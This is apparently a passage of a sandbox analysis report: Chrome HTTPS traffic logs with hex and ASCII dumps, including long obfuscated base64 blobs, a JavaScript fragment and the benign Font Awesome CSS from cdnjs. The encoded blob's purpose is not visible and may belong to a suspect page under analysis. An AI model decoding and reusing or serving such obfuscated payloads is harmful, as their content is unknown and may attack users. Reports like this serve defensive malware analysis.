                                              Data Ascii: dVdkdDRHSTFHMTR1SVF5UGklMEQlMEFtSWc0YzUzN1FXR0Nick1RTHFJd0lhSXdRWWR2ekJRbXRwMTdHaWxjV003NVg4Mk5xajdKY1VUUHR2UDF6VUlBQUlCNlJjUVZJdUswJTBEJTBBeXU5UGp5eHY0TFEzZDlqbWxOS0JPZWVuUnNUbmRuSmZLRXpRYlJiQ1JSUW1SQlFtNlBETm1jTEV0dk0ySTRVTHpac0R6SXZxM2pCeCUwRCUwQVdJKzI
                                              2023-09-05 23:45:25 UTC302INData Raw: 0d 0a
                                              Data Ascii:
                                              2023-09-05 23:45:25 UTC302INData Raw: 31 66 34 30 0d 0a 4a 33 4e 45 74 35 63 33 4a 57 4f 44 51 31 55 48 70 76 61 54 4e 30 55 48 68 36 4d 6e 4e 7a 4b 32 63 77 56 55 77 34 4f 44 55 7a 4e 69 74 58 64 48 64 4b 52 58 68 42 4f 48 46 50 62 54 64 6c 59 32 68 49 59 6e 42 49 65 44 63 6c 4d 45 51 6c 4d 45 46 6d 5a 6e 45 32 4b 79 73 35 4d 44 5a 50 4f 43 39 6a 63 55 4e 49 62 58 4d 79 62 47 70 4b 55 6c 4e 6c 62 6c 70 73 64 6e 70 4b 5a 46 5a 4d 4e 56 46 51 61 69 74 70 55 45 35 48 55 48 4e 57 4e 32 56 4a 61 6b 70 6b 59 6b 52 77 65 48 64 48 55 44 59 72 53 6c 52 54 4e 46 4e 74 62 44 4e 35 4d 32 4a 34 54 45 4a 5a 4a 54 42 45 4a 54 42 42 64 6b 5a 4a 53 32 6c 4a 5a 30 68 45 4e 6c 4e 33 63 7a 6b 32 59 32 35 75 54 69 74 6c 4f 44 63 31 61 30 4e 48 4f 53 39 58 61 7a 68 49 64 43 39 53 64 6d 68 6d 57 6a 68 43 65 6d 31
                                              Data Ascii: 1f40J3NEt5c3JWODQ1UHpvaTN0UHh6MnNzK2cwVUw4ODUzNitXdHdKRXhBOHFPbTdlY2hIYnBIeDclMEQlMEFmZnE2Kys5MDZPOC9jcUNIbXMybGpKUlNlblpsdnpKZFZMNVFQaitpUE5HUHNWN2VJakpkYkRweHdHUDYrSlRTNFNtbDN5M2J4TEJZJTBEJTBBdkZJS2lJZ0hENlN3czk2Y25uTitlODc1a0NHOS9XazhIdC9SdmhmWjhCem1
                                              2023-09-05 23:45:25 UTC310INData Raw: 62 6d 46 68 5a 6e 51 33 61 6c 5a 4a 64 45 63 31 65 54 41 30 4d 7a 5a 44 65 58 6f 78 4d 30 39 4e 64 57 5a 72 62 6b 51 34 4e 33 5a 68 4e 44 64 61 54 6d 4a 51 53 33 6b 31 5a 32 4e 36 62 6b 39 53 54 56 52 71 56 57 74 77 53 46 4a 4e 55 7a 4e 43 64 6a 5a 58 61 57 5a 4b 63 31 70 4d 55 45 4d 6c 4d 45 51 6c 4d 45 46 6f 53 57 70 44 51 6b 46 76 56 45 6c 6e 62 31 52 44 61 45 31 70 51 32 68 4e 62 31 52 4e 65 6d 30 33 4d 7a 56 7a 56 46 6c 30 63 33 4d 76 64 32 78 53 55 53 39 48 4e 30 31 7a 4e 69 39 6f 52 47 35 56 55 57 39 55 51 32 68 4e 53 30 55 33 4f 57 4e 58 54 48 52 31 55 6c 42 34 61 33 6c 4f 4b 7a 56 4d 4e 69 74 77 4a 54 42 45 4a 54 42 42 56 47 6c 75 5a 48 51 33 64 32 78 5a 61 56 41 7a 55 6d 5a 75 64 6b 77 79 4f 48 4e 70 62 32 63 7a 56 45 67 34 51 6e 46 55 51 57 68
                                              Data Ascii: bmFhZnQ3alZJdEc1eTA0MzZDeXoxM09NdWZrbkQ4N3ZhNDdaTmJQS3k1Z2N6bk9STVRqVWtwSFJNUzNCdjZXaWZKc1pMUEMlMEQlMEFoSWpDQkFvVElnb1RDaE1pQ2hNb1RNem03MzVzVFl0c3Mvd2xSUS9HN01zNi9oRG5VUW9UQ2hNS0U3OWNXTHR1UlB4a3lOKzVMNitwJTBEJTBBVGluZHQ3d2xZaVAzUmZudkwyOHNpb2czVEg4QnFUQWh
                                              2023-09-05 23:45:25 UTC317INData Raw: 0d 0a
                                              Data Ascii:
                                              2023-09-05 23:45:25 UTC317INData Raw: 31 66 34 30 0d 0a 46 45 51 55 46 44 4e 7a 68 47 55 31 6c 31 65 47 5a 54 57 47 4a 4f 56 54 68 79 52 54 68 77 59 6d 45 78 65 43 55 77 52 43 55 77 51 55 68 45 57 6b 35 6a 4e 58 56 31 4c 79 39 77 64 45 35 43 63 47 52 69 57 56 42 74 63 55 31 4d 52 57 5a 4d 59 58 4a 33 63 31 46 50 53 30 73 34 56 58 49 76 55 30 49 32 57 57 74 53 59 31 46 57 62 69 39 56 52 6d 51 7a 4d 56 4a 6b 62 55 31 6e 4e 53 38 32 64 44 6c 48 52 47 56 32 5a 46 41 35 4f 58 49 79 4d 32 49 6c 4d 45 51 6c 4d 45 46 51 59 7a 4e 44 64 56 59 79 59 6d 51 76 4e 46 52 69 63 47 56 54 64 79 74 68 4e 57 4a 68 57 6e 5a 6e 59 58 42 34 64 54 56 34 56 43 73 32 59 30 5a 6c 4d 31 52 6a 5a 6c 63 32 62 46 6b 72 61 48 59 33 59 6a 4d 31 55 31 4e 72 4f 57 39 31 54 48 4a 78 5a 6a 41 33 54 33 52 6a 56 55 70 31 62 7a 5a
                                              Data Ascii: 1f40FEQUFDNzhGU1l1eGZTWGJOVThyRThwYmExeCUwRCUwQUhEWk5jNXV1Ly9wdE5CcGRiWVBtcU1MRWZMYXJ3c1FPS0s4VXIvU0I2WWtSY1FWbi9VRmQzMVJkbU1nNS82dDlHRGV2ZFA5OXIyM2IlMEQlMEFQYzNDdVYyYmQvNFRicGVTdythNWJhWnZnYXB4dTV4VCs2Y0ZlM1RjZlc2bFkraHY3YjM1U1NrOW91THJxZjA3T3RjVUp1bzZ
                                              2023-09-05 23:45:25 UTC325INData Raw: 4d 47 46 71 4d 47 56 56 4e 32 5a 4f 65 44 68 30 59 6b 78 34 55 45 30 33 57 6e 4a 6f 64 6b 63 30 4c 30 55 35 53 32 6c 33 4e 53 39 72 56 30 68 71 61 6a 4a 47 61 57 4a 78 64 53 55 77 52 43 55 77 51 55 31 53 55 57 31 5a 52 6e 42 7a 61 45 6c 7a 62 31 52 4a 5a 32 39 55 54 6b 52 6f 51 7a 4d 72 52 6d 6c 6c 62 56 41 32 57 6b 31 79 4d 6d 31 43 4f 44 4e 33 65 55 64 5a 53 45 34 31 65 6c 68 45 53 45 67 31 57 6a 68 7a 63 55 77 78 63 45 52 42 65 47 30 7a 52 6c 5a 74 54 6d 70 34 52 30 35 59 4d 6a 45 33 62 32 59 6c 4d 45 51 6c 4d 45 45 34 4e 6e 5a 50 5a 48 56 30 57 46 6c 68 53 58 6c 4c 59 56 5a 75 56 6c 42 6f 4e 6d 49 79 4f 45 67 32 59 7a 52 34 57 44 6c 30 5a 6e 6c 32 4f 54 4d 78 4f 46 6c 33 4e 54 4e 34 55 56 4a 4b 65 58 4d 31 52 45 51 78 4f 44 68 54 57 47 31 78 59 54 56
                                              Data Ascii: MGFqMGVVN2ZOeDh0Ykx4UE03WnJodkc0L0U5S2l3NS9rV0hqajJGaWJxdSUwRCUwQU1SUW1ZRnBzaElzb1RJZ29UTkRoQzMrRmllbVA2Wk1yMm1CODN3eUdZSE41elhESEg1WjhzcUwxcERBeG0zRlZtTmp4R05YMjE3b2YlMEQlMEE4NnZPZHV0WFlhSXlLYVZuVlBoNmIyOEg2YzR4WDl0Znl2OTMxOFl3NTN4UVJKeXM1REQxODhTWG1xYTV
                                              2023-09-05 23:45:25 UTC333INData Raw: 0d 0a
                                              Data Ascii:
                                              2023-09-05 23:45:25 UTC333INData Raw: 31 66 34 30 0d 0a 42 45 4a 54 42 42 53 32 74 35 63 7a 41 35 54 46 4d 77 61 44 52 53 59 31 64 78 62 44 55 30 5a 6e 70 6a 4f 44 51 7a 4f 47 31 7a 4c 33 6c 50 63 32 4a 6f 57 57 31 4c 4e 56 70 35 5a 6c 5a 50 61 7a 55 31 4b 32 4d 31 4e 54 4d 7a 54 6a 52 48 65 55 35 34 4b 30 34 33 56 6e 4a 6e 4d 6d 5a 73 51 53 74 46 56 30 67 79 52 6e 46 6a 56 53 55 77 52 43 55 77 51 57 4a 57 53 6b 74 79 4e 6a 4d 31 62 6d 6c 6c 62 44 6c 50 62 31 6f 76 62 54 55 72 64 48 52 4a 65 47 56 68 64 6c 5a 51 57 6d 5a 79 63 58 4e 4e 63 56 68 43 4f 48 59 32 55 45 49 30 53 32 74 36 56 58 52 6d 4e 58 4a 4c 61 33 67 34 65 46 4a 74 54 46 52 79 54 56 4a 4d 63 55 6c 33 53 57 46 4a 64 31 46 5a 59 33 59 6c 4d 45 51 6c 4d 45 45 76 51 6c 56 74 64 57 70 46 55 48 6f 78 53 6a 67 79 55 46 68 4f 61 57 46
                                              Data Ascii: 1f40BEJTBBS2t5czA5TFMwaDRSY1dxbDU0ZnpjODQzOG1zL3lPc2JoWW1LNVp5ZlZPazU1K2M1NTMzTjRHeU54K043VnJnMmZsQStFV0gyRnFjVSUwRCUwQWJWSktyNjM1bmllbDlPb1ovbTUrdHRJeGVhdlZQWmZycXNNcVhCOHY2UEI0S2t6VXRmNXJLa3g4eFJtTFRyTVJMcUl3SWFJd1FZY3YlMEQlMEEvQlVtdWpFUHoxSjgyUFhOaWF
                                              2023-09-05 23:45:25 UTC341INData Raw: 53 48 56 48 5a 55 30 30 4f 55 38 72 5a 6a 68 75 63 32 31 69 4a 54 42 45 4a 54 42 42 53 44 4d 35 61 6a 4e 74 4c 7a 68 4c 56 30 30 76 53 47 38 76 64 6c 56 5a 4e 6a 6c 56 64 48 64 68 4d 45 78 71 4c 31 49 35 64 54 4a 31 65 58 52 4e 53 30 56 33 63 33 56 45 52 48 68 7a 51 6a 52 6c 56 7a 45 72 54 6d 6c 4a 55 45 78 4b 4e 6e 56 74 54 31 5a 69 62 45 52 53 57 58 42 77 57 57 56 75 62 45 34 30 4e 69 55 77 52 43 55 77 51 57 56 57 64 6c 42 4b 5a 6a 4e 6d 56 6a 56 6f 55 57 31 43 51 56 4a 6f 55 57 74 53 61 46 46 72 56 55 70 6f 55 57 31 6b 64 6d 35 43 4d 7a 55 77 53 44 68 46 52 47 74 43 4b 31 63 78 62 32 31 61 59 6c 6c 56 53 6d 68 76 63 7a 64 44 55 6b 35 4e 4d 46 5a 35 64 6b 68 7a 59 30 78 46 63 69 74 55 4e 47 6c 49 61 47 49 6c 4d 45 51 6c 4d 45 46 53 52 48 6b 35 64 6b 5a
                                              Data Ascii: SHVHZU00OU8rZjhuc21iJTBEJTBBSDM5ajNtLzhLV00vSG8vdlVZNjlVdHdhMExqL1I5dTJ1eXRNS0V3c3VERHhzQjRlVzErTmlJUExKNnVtT1ZibERSWXBwWWVubE40NiUwRCUwQWVWdlBKZjNmVjVoUW1CQVJoUWtSaFFrVUpoUW1kdm5CMzUwSDhFRGtCK1cxb21aYllVSmhvczdDUk5NMFZ5dkhzY0xFcitUNGlIaGIlMEQlMEFSRHk5dkZ
                                              2023-09-05 23:45:25 UTC349INData Raw: 0d 0a
                                              Data Ascii:
                                              2023-09-05 23:45:25 UTC349INData Raw: 31 66 34 30 0d 0a 68 4e 65 44 5a 51 63 6a 4a 74 4d 6b 35 75 55 6b 51 76 62 30 4a 47 65 6d 77 76 56 45 35 49 59 33 68 44 4e 33 4d 34 5a 44 51 72 64 44 52 53 61 54 6c 4e 52 47 35 75 64 48 42 4b 65 43 39 59 51 58 52 5a 65 6d 39 6c 4a 54 42 45 4a 54 42 42 61 69 73 76 61 46 4e 4b 61 55 34 34 61 58 4a 56 62 45 35 4b 4f 57 4e 7a 4e 53 39 47 65 45 55 76 52 32 5a 6f 5a 6a 42 49 4e 6e 42 69 51 54 51 78 56 46 68 50 4d 31 42 71 64 7a 42 71 4e 47 64 71 59 58 70 75 52 31 42 54 64 32 4e 73 63 48 70 36 4f 56 4e 4b 61 55 5a 43 52 57 5a 49 4f 47 68 45 4f 46 56 30 54 43 55 77 52 43 55 77 51 57 56 52 4d 7a 46 51 4e 6d 46 56 4c 32 35 6f 4d 57 52 6d 56 57 46 57 63 32 5a 44 65 6e 42 6b 57 48 6c 71 62 69 39 69 61 33 4a 77 62 46 46 51 4c 32 52 4e 5a 6a 4e 35 65 47 6c 56 56 44 41
                                              Data Ascii: 1f40hNeDZQcjJtMk5uUkQvb0JGemwvVE5IY3hDN3M4ZDQrdDRSaTlNRG5udHBKeC9YQXRZem9lJTBEJTBBaisvaFNKaU44aXJVbE5KOWNzNS9GeEUvR2ZoZjBINnBiQTQxVFhPM1BqdzBqNGdqYXpuR1BTd2NscHp6OVNKaUZCRWZIOGhEOFV0TCUwRCUwQWVRMzFQNmFVL25oMWRmVWFWc2ZDenBkWHlqbi9ia3JwbFFQL2RNZjN5eGlVVDA
                                              2023-09-05 23:45:25 UTC357INData Raw: 3d 20 27 28 27 20 7c 7c 20 74 6f 6b 65 6e 73 5b 69 5d 2e 74 65 78 74 20 3d 3d 3d 20 27 5b 27 20 7c 7c 20 74 6f 6b 65 6e 73 5b 69 5d 2e 74 65 78 74 20 3d 3d 3d 20 27 7b 27 29 20 7b 0d 0a 09 09 09 62 72 61 63 6b 65 74 73 4c 65 76 65 6c 2b 2b 3b 0d 0a 09 09 09 69 66 20 28 62 72 61 63 6b 65 74 73 4c 65 76 65 6c 20 3d 3d 20 31 29 20 7b 0d 0a 09 09 09 09 62 72 61 63 6b 65 74 73 50 6f 73 2e 70 75 73 68 28 69 29 3b 0d 0a 09 09 09 7d 0d 0a 09 09 7d 20 65 6c 73 65 20 69 66 20 28 74 6f 6b 65 6e 73 5b 69 5d 2e 74 65 78 74 20 3d 3d 3d 20 27 29 27 20 7c 7c 20 74 6f 6b 65 6e 73 5b 69 5d 2e 74 65 78 74 20 3d 3d 3d 20 27 5d 27 20 7c 7c 20 74 6f 6b 65 6e 73 5b 69 5d 2e 74 65 78 74 20 3d 3d 3d 20 27 7d 27 29 20 7b 0d 0a 09 09 09 62 72 61 63 6b 65 74 73 4c 65 76 65 6c 2d 2d
                                              Data Ascii: = '(' || tokens[i].text === '[' || tokens[i].text === '{') {bracketsLevel++;if (bracketsLevel == 1) {bracketsPos.push(i);}} else if (tokens[i].text === ')' || tokens[i].text === ']' || tokens[i].text === '}') {bracketsLevel--
                                              2023-09-05 23:45:25 UTC358INData Raw: 0d 0a
                                              Data Ascii:
                                              2023-09-05 23:45:25 UTC358INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              3192.168.2.449734104.17.24.14443C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampkBytes transferredDirectionData
                                              2023-09-05 23:45:26 UTC358OUTGET /ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css HTTP/1.1
                                              Host: cdnjs.cloudflare.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: text/css,*/*;q=0.1
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: style
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2023-09-05 23:45:26 UTC375INHTTP/1.1 200 OK
                                              Date: Tue, 05 Sep 2023 23:45:26 GMT
                                              Content-Type: text/css; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Access-Control-Allow-Origin: *
                                              Cache-Control: public, max-age=30672000
                                              ETag: W/"5eb03e5f-7918"
                                              Last-Modified: Mon, 04 May 2020 16:10:07 GMT
                                              cf-cdnjs-via: cfworker/kv
                                              Cross-Origin-Resource-Policy: cross-origin
                                              Timing-Allow-Origin: *
                                              X-Content-Type-Options: nosniff
                                              CF-Cache-Status: HIT
                                              Age: 7298223
                                              Expires: Sun, 25 Aug 2024 23:45:26 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pX%2BPcKwy6cntM2St3MmUl%2Bbwf1rbBBzhaj2egpfx%2B%2FGG2eiHBK2piMPUIYW7TuD%2B7fKmlI1mU2PJD1tlsQ%2BvCtjrOpOXLW7p3f4B2j3DEM6MQqP1mVPxUlP7d6f7U7Yd6N15wVE2"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=15780000
                                              Server: cloudflare
                                              CF-RAY: 8022588d9db72f1c-LAX
                                              alt-svc: h3=":443"; ma=86400
                                              2023-09-05 23:45:26 UTC376INData Raw: 33 39 64 38 0d 0a 2f 2a 21 0a 20 2a 20 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 34 2e 37 2e 30 20 62 79 20 40 64 61 76 65 67 61 6e 64 79 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 20 2d 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 0a 20 2a 20 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 2f 6c 69 63 65 6e 73 65 20 28 46 6f 6e 74 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 53 53 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 46 6f 6e 74 41 77 65 73 6f 6d 65 27 3b 73 72 63 3a 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 65 6f 74 3f 76 3d 34 2e 37
                                              Data Ascii: 39d8/*! * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License) */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot?v=4.7
                                              2023-09-05 23:45:26 UTC377INData Raw: 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 77 6f 66 66 3f 76 3d 34 2e 37 2e 30 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 2c 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 74 74 66 3f 76 3d 34 2e 37 2e 30 27 29 20 66 6f 72 6d 61 74 28 27 74 72 75 65 74 79 70 65 27 29 2c 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 73 76 67 3f 76 3d 34 2e 37 2e 30 23 66 6f 6e 74 61 77 65 73 6f 6d 65 72 65 67 75 6c 61 72 27 29 20 66 6f 72 6d 61 74 28 27 73 76 67 27 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 7d 2e 66 61 7b 64 69 73 70 6c 61 79
                                              Data Ascii: ../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'),url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'),url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{display
                                              2023-09-05 23:45:26 UTC378INData Raw: 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 31 30 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65 67 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 73 70 69 6e 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 31 30 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65
                                              Data Ascii: {-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359de
                                              2023-09-05 23:45:26 UTC379INData Raw: 61 63 6b 2d 31 78 2c 2e 66 61 2d 73 74 61 63 6b 2d 32 78 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 66 61 2d 73 74 61 63 6b 2d 31 78 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 2e 66 61 2d 73 74 61 63 6b 2d 32 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 7d 2e 66 61 2d 69 6e 76 65 72 73 65 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 66 61 2d 67 6c 61 73 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 30 22 7d 2e 66 61 2d 6d 75 73 69 63 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 31 22 7d 2e 66 61 2d 73 65 61 72 63 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 32
                                              Data Ascii: ack-1x,.fa-stack-2x{position:absolute;left:0;width:100%;text-align:center}.fa-stack-1x{line-height:inherit}.fa-stack-2x{font-size:2em}.fa-inverse{color:#fff}.fa-glass:before{content:"\f000"}.fa-music:before{content:"\f001"}.fa-search:before{content:"\f002
                                              2023-09-05 23:45:26 UTC381INData Raw: 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 33 22 7d 2e 66 61 2d 66 6c 61 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 34 22 7d 2e 66 61 2d 68 65 61 64 70 68 6f 6e 65 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 35 22 7d 2e 66 61 2d 76 6f 6c 75 6d 65 2d 6f 66 66 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 36 22 7d 2e 66 61 2d 76 6f 6c 75 6d 65 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 37 22 7d 2e 66 61 2d 76 6f 6c 75 6d 65 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 38 22 7d 2e 66 61 2d 71 72 63 6f 64 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 39 22 7d 2e 66 61 2d 62 61 72 63 6f 64 65 3a 62 65 66 6f 72 65
                                              Data Ascii: re{content:"\f023"}.fa-flag:before{content:"\f024"}.fa-headphones:before{content:"\f025"}.fa-volume-off:before{content:"\f026"}.fa-volume-down:before{content:"\f027"}.fa-volume-up:before{content:"\f028"}.fa-qrcode:before{content:"\f029"}.fa-barcode:before
                                              2023-09-05 23:45:26 UTC382INData Raw: 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 38 22 7d 2e 66 61 2d 66 61 73 74 2d 62 61 63 6b 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 39 22 7d 2e 66 61 2d 62 61 63 6b 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 61 22 7d 2e 66 61 2d 70 6c 61 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 62 22 7d 2e 66 61 2d 70 61 75 73 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 63 22 7d 2e 66 61 2d 73 74 6f 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 64 22 7d 2e 66 61 2d 66 6f 72 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 65 22 7d 2e 66 61 2d 66 61 73 74 2d 66 6f 72 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f
                                              Data Ascii: ore{content:"\f048"}.fa-fast-backward:before{content:"\f049"}.fa-backward:before{content:"\f04a"}.fa-play:before{content:"\f04b"}.fa-pause:before{content:"\f04c"}.fa-stop:before{content:"\f04d"}.fa-forward:before{content:"\f04e"}.fa-fast-forward:before{co
                                              2023-09-05 23:45:26 UTC383INData Raw: 2e 66 61 2d 65 79 65 2d 73 6c 61 73 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 30 22 7d 2e 66 61 2d 77 61 72 6e 69 6e 67 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 31 22 7d 2e 66 61 2d 70 6c 61 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 32 22 7d 2e 66 61 2d 63 61 6c 65 6e 64 61 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 33 22 7d 2e 66 61 2d 72 61 6e 64 6f 6d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 34 22 7d 2e 66 61 2d 63 6f 6d 6d 65 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 35 22 7d 2e 66 61 2d 6d 61 67 6e 65 74 3a 62 65
                                              Data Ascii: .fa-eye-slash:before{content:"\f070"}.fa-warning:before,.fa-exclamation-triangle:before{content:"\f071"}.fa-plane:before{content:"\f072"}.fa-calendar:before{content:"\f073"}.fa-random:before{content:"\f074"}.fa-comment:before{content:"\f075"}.fa-magnet:be
                                              2023-09-05 23:45:26 UTC385INData Raw: 70 68 6f 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 35 22 7d 2e 66 61 2d 73 71 75 61 72 65 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 36 22 7d 2e 66 61 2d 62 6f 6f 6b 6d 61 72 6b 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 37 22 7d 2e 66 61 2d 70 68 6f 6e 65 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 38 22 7d 2e 66 61 2d 74 77 69 74 74 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 39 22 7d 2e 66 61 2d 66 61 63 65 62 6f 6f 6b 2d 66 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 66 61 63 65 62 6f 6f 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 61 22 7d 2e 66 61 2d 67 69 74 68 75 62 3a 62 65 66 6f 72 65 7b 63
                                              Data Ascii: phone:before{content:"\f095"}.fa-square-o:before{content:"\f096"}.fa-bookmark-o:before{content:"\f097"}.fa-phone-square:before{content:"\f098"}.fa-twitter:before{content:"\f099"}.fa-facebook-f:before,.fa-facebook:before{content:"\f09a"}.fa-github:before{c
